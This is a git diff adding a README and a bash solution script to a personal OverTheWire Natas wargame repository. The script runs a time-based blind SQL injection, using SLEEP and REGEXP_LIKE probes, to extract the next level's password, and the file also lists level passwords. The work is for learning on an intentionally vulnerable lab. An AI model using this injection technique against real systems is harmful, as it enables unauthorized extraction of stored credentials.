<Natas> +README.md

overthewire/natas/README.md

@@ -0,0 +1,8 @@
+## Natas
+If you're reading this then probably don't. These scripts are inefficient,
+written entirely for my learning, and not designed to teach anyone.
+> **Note to Self:** All the solutions are written in bash even though its
+> incredibly inefficient for these questions. Simply because I need to
+> improve my ability to use bash for complex scripts so yeah!!
+
+

overthewire/natas/passwords.md

@@ -1,3 +1,4 @@
+### Passwords + Methodology
 natas0: natas0
 natas1: 0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq
 	View source
@@ -279,4 +280,114 @@ done
 echo
 ```
 
+###### Natas17 Solution Script
+```bash
+#!/usr/bin/env bash
 
+USERNAME="natas17"
+PASSWORD="EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC"
+TARGET="natas18"
+
+DELAY=4
+PREFIX="5mxv8BZZVSMzzYPcY95M9m"
+
+req() {
+  CMD=$@
+  curl "http://$USERNAME.natas.labs.overthewire.org/index.php" \
+       -X POST \
+       -u "$USERNAME:$PASSWORD" \
+       -d "username=natas18\" AND $CMD AND SLEEP($DELAY) # " \
+       -sS &>/dev/null
+}
+
+time_req() (
+  export STAT
+  export CMD="$@"
+  (time (req $CMD; STAT=$?)) \
+    |& grep real \
+    |  awk '{print substr($2, 3, 1)}'
+  return $STAT
+)
+
+# ie `guess_length "=32"` or `guess_length ">32"`
+guess_length() {
+  ELAPSED=$(time_req "LENGTH(password)$1")
+  return $(( ELAPSED < DELAY ))
+}
+
+get_length() {
+  echo "[*] Guessing length"
+  local MIN=${1:-1}
+  local MAX=${2:-100}
+  # local PADMAX=${#MAX}
+  local FGUESS="%${#MAX}s-%-${#MAX}s"
+  while true; do
+    printf "[-] Guess: $FGUESS\r" $MIN $MAX
+    if [ $((MAX-MIN)) -eq 1 ]; then
+      break
+    fi;
+    
+    local MID=$(( (MAX+MIN)/2 ))
+    guess_length ">$MID" && MIN=$MID || MAX=$MID
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+  return $MAX
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  ELAPSED=$(time_req "REGEXP_LIKE(password, '^$1[a-zA-Z0-9]*\$', 'c')")
+  return $(( ELAPSED < DELAY ))
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          local NEWCHAR
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            NEWCHAR=${chars:MIN-1:1}
+          else
+            NEWCHAR=${chars:MAX-1:1}
+          fi
+          PREFIX="$PREFIX$NEWCHAR"
+          echo -e "[+] Update: $NEWCHAR -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+get_length
+LENGTH=$?
+exploit_oracle "$LENGTH"
+```